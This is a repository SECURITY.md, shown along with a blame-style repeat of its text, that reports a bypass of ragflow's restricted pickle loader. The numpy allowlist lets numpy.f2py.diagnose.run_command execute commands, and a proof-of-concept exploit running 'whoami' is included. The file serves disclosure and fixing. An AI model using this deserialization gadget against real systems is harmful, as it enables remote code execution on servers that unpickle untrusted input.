ragflow_python/SECURITY.md

# Security Policy

## Supported Versions

Use this section to tell people about which versions of your project are
currently being supported with security updates.

| Version | Supported          |
| ------- | ------------------ |
| <=0.7.0   | :white_check_mark: |

## Reporting a Vulnerability

### Branch name

main

### Actual behavior

The restricted_loads function at [api/utils/__init__.py#L215](https://github.com/infiniflow/ragflow/blob/main/api/utils/__init__.py#L215) is still vulnerable leading via code execution.
The main reson is that numpy module has a numpy.f2py.diagnose.run_command function directly execute commands, but the restricted_loads function allows users import functions in module numpy.


### Steps to reproduce


**ragflow_patch.py**

```py
import builtins
import io
import pickle

safe_module = {
    'numpy',
    'rag_flow'
}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        import importlib
        if module.split('.')[0] in safe_module:
            _module = importlib.import_module(module)
            return getattr(_module, name)
        # Forbid everything else.
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
                                     (module, name))


def restricted_loads(src):
    """Helper function analogous to pickle.loads()."""
    return RestrictedUnpickler(io.BytesIO(src)).load()
```
Then, **PoC.py**
```py
import pickle
from ragflow_patch import restricted_loads
class Exploit:
     def __reduce__(self):
         import numpy.f2py.diagnose
         return numpy.f2py.diagnose.run_command, ('whoami', )

Payload=pickle.dumps(Exploit())
restricted_loads(Payload)
```
**Result**
![image](https://github.com/infiniflow/ragflow/assets/85293841/8e5ed255-2e84-466c-bce4-776f7e4401e8)


### Additional information

#### How to prevent?
Strictly filter the module and name before calling with getattr function.
Create SECURITY.md (#1241) ### What problem does this PR solve? The restricted_loads function at [api/utils/init.py#L215](https://github.com/infiniflow/ragflow/blob/main/api/utils/__init__.py#L215) is still vulnerable leading via code execution. The main reson is that numpy module has a numpy.f2py.diagnose.run_command function directly execute commands, but the restricted_loads function allows users import functions in module numpy. ### Additional Details [https://github.com/infiniflow/ragflow/issues/1240](https://github.com/infiniflow/ragflow/issues/1240) ### Type of change - [ ] Bug Fix (non-breaking change which fixes an issue) - [ ] New Feature (non-breaking change which adds functionality) - [ ] Documentation Update - [ ] Refactoring - [ ] Performance Improvement - [ ] Other (please describe): 2024-06-24 10:14:57 +08:00			`# Security Policy`

			`## Supported Versions`

			`Use this section to tell people about which versions of your project are`
			`currently being supported with security updates.`

			`\| Version \| Supported \|`
			`\| ------- \| ------------------ \|`
Update SECURITY.md (#1248) ### What problem does this PR solve? ### Type of change - [x] Documentation Update 2024-06-24 16:30:17 +08:00			`\| <=0.7.0 \| :white_check_mark: \|`
Create SECURITY.md (#1241) ### What problem does this PR solve? The restricted_loads function at [api/utils/init.py#L215](https://github.com/infiniflow/ragflow/blob/main/api/utils/__init__.py#L215) is still vulnerable leading via code execution. The main reson is that numpy module has a numpy.f2py.diagnose.run_command function directly execute commands, but the restricted_loads function allows users import functions in module numpy. ### Additional Details [https://github.com/infiniflow/ragflow/issues/1240](https://github.com/infiniflow/ragflow/issues/1240) ### Type of change - [ ] Bug Fix (non-breaking change which fixes an issue) - [ ] New Feature (non-breaking change which adds functionality) - [ ] Documentation Update - [ ] Refactoring - [ ] Performance Improvement - [ ] Other (please describe): 2024-06-24 10:14:57 +08:00
			`## Reporting a Vulnerability`

			`### Branch name`

			`main`

			`### Actual behavior`

			`The restricted_loads function at [api/utils/__init__.py#L215](https://github.com/infiniflow/ragflow/blob/main/api/utils/__init__.py#L215) is still vulnerable leading via code execution.`
			`The main reson is that numpy module has a numpy.f2py.diagnose.run_command function directly execute commands, but the restricted_loads function allows users import functions in module numpy.`


			`### Steps to reproduce`


			`ragflow_patch.py`

			```py
			`import builtins`
			`import io`
			`import pickle`

			`safe_module = {`
			`'numpy',`
			`'rag_flow'`
			`}`


			`class RestrictedUnpickler(pickle.Unpickler):`
			`def find_class(self, module, name):`
			`import importlib`
			`if module.split('.')[0] in safe_module:`
			`_module = importlib.import_module(module)`
			`return getattr(_module, name)`
			`# Forbid everything else.`
			`raise pickle.UnpicklingError("global '%s.%s' is forbidden" %`
			`(module, name))`


			`def restricted_loads(src):`
			`"""Helper function analogous to pickle.loads()."""`
			`return RestrictedUnpickler(io.BytesIO(src)).load()`
			```
			`Then, PoC.py`
			```py
			`import pickle`
			`from ragflow_patch import restricted_loads`
			`class Exploit:`
			`def __reduce__(self):`
			`import numpy.f2py.diagnose`
			`return numpy.f2py.diagnose.run_command, ('whoami', )`

			`Payload=pickle.dumps(Exploit())`
			`restricted_loads(Payload)`
			```
			`Result`
			`![image](https://github.com/infiniflow/ragflow/assets/85293841/8e5ed255-2e84-466c-bce4-776f7e4401e8)`


			`### Additional information`

			`#### How to prevent?`
			`Strictly filter the module and name before calling with getattr function.`